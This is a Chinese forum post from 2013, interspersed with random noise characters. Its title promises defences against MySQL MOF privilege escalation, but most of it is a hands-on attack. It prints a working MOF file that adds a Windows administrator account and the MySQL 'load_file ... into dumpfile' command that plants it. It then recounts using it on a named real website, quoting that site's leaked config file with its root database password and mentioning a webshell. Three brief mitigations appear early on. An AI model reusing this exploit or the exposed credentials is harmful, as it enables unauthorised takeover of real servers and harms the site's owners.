Mysql mof扩展漏洞防范方法. X' E* F) H; Z# G: R9 l
( a0 ^. _8 ^3 k' y" @! o
网上公开的一些利用代码:- ?- J0 V$ t$ X: X. Q5 ^* m
6 v" g3 p; U- ?0 h3 h9 ]#pragma namespace(“\\\\.\\root\\subscription”)( Q( c) ]/ t/ S( K; C; K' E% a% M6 f
& i9 m. n7 t* @" g) |% Y. p7 ginstance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };/ A) ~& B9 `- r$ x7 C+ b+ j# b
# _+ ~' g# @' c
4 b2 c9 p# D! V- v" Q- U5 V: n8 z1 g- @ \" U6 _6 p% Q/ W
( J T$ }( Q ^6 P2 |% y
+ W7 `' x2 R, i# D" x连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
( ^6 k6 |% e' Q从上面代码来看得出解决办法:9 o% C+ a% q. N# v4 t3 D
( _7 A+ o9 x% `! ~
1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数7 u# x' m3 |4 w
3 [' k0 o% k* Q" y4 n. O) y! t
2、禁止使用”WScript.Shel”组件$ t2 }" q8 C, N- @
5 j' U+ I# d# M4 w& N3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER* B" J: c# |6 K! c
8 a" W9 x. W$ W; H: C9 b( ^
当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下3 M4 X- V3 @: F! G( _/ v* \8 T
8 G, H$ P' }# f$ [ n. n8 w. ]事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权! t- t7 S, j/ W4 w0 v1 X5 i$ Q
( M0 {0 r3 ^5 G9 @" X: ^( I9 j c但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容
& p+ {, |; X, G! _6 n- O' N0 a+ s% U+ F7 j- K( _7 W4 ~3 ]
看懂了后就开始练手吧
$ a. t2 @, A0 l; K" c H- N. U0 V# r* X( K
http://www.webbmw.com/config/config_ucenter.php 一句话 a" ]- r4 A3 S4 s4 J
, u! Y5 q2 C/ r
$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。
, s/ ]/ E( A& S+ c: F. u2 a! x7 {8 D: [3 E$ N; g& J* E
于是直接用菜刀开搞
) E: ~- u$ D" E/ y
6 I: g8 K4 d* f3 z# i7 z上马先3 o% J* E' b: W
& Q; r) R5 s3 F& _7 y既然有了那些账号 之类的 于是我们就执行吧…….( {/ R) }. {, P' u- a! q, C5 z, `; p
z: ?6 V: A3 y4 j/ [7 s2 {1 p小小的说下
/ u% i# H. K( ^" H' ]9 ~
; G' ~ M; I7 W$ D! d, Y" D在这里第1次执行未成功 原因未知1 @1 w9 C! T$ l# g
- A, n+ b, Y- x$ m6 ~& f. [+ u我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。
# \+ {9 {0 h, ~$ Q8 f6 \
* z* |3 Z. l, j C$ I( a#pragma namespace(“\\\\.\\root\\subscription”); k4 A+ A2 P, T$ c
. Y( a- R3 O0 vinstance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };1 x2 l L: y- j( A0 E+ T
# e) ] b' f* y* f我是将文件放到C:\WINDOWS\temp\1.mof
' J6 Q$ I) U+ U; z( X: D m U9 L& U6 X& N. E( c$ \! I2 J! `
所以我们就改下执行的代码/ x) a* p9 o! j2 l8 U2 \6 Q! g0 r) o
$ _2 }( s1 e6 ?' h) e( I7 pselect load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
- |: ]* L% i6 m" W3 H/ x& _/ x |" Y
5 w. i+ K1 T( P: \
/ j+ q5 \, b7 J3 P但是 你会发现账号还是没有躺在那里。。
" }% U) F- }% g$ `/ W; R7 C: s* I) y+ n
于是我就感觉蛋疼
6 u) {, J* _3 P( ?) m ^ R8 s
# D+ R: B+ o5 V {) ]就去一个一个去执行 但是执行到第2个 mysql时就成功了………
\9 {, c+ ^& C2 p! Y0 [1 ]! X
- [# ?) W* E! Z" K4 J. h/ y
Y x- h2 @( A% A2 y4 G' Q0 Q
8 v* b' i% D+ F# ?' e1 w6 h& E3 K但是其他库均不成功…1 `; c% ?# f1 S. s' }' V
( V) k6 i) Z- \% |- ?) I0 b, i
我就很费解呀 到底为什么不成功求大牛解答…
+ s2 O& B- \5 V0 o& v. P5 z+ W' p& d' w$ K9 ?* O6 n8 p
9 ]8 C6 d d4 c) o
% t2 |, u# W1 z F
|
发表于 2013-1-4 19:49:49
收藏
支持
反对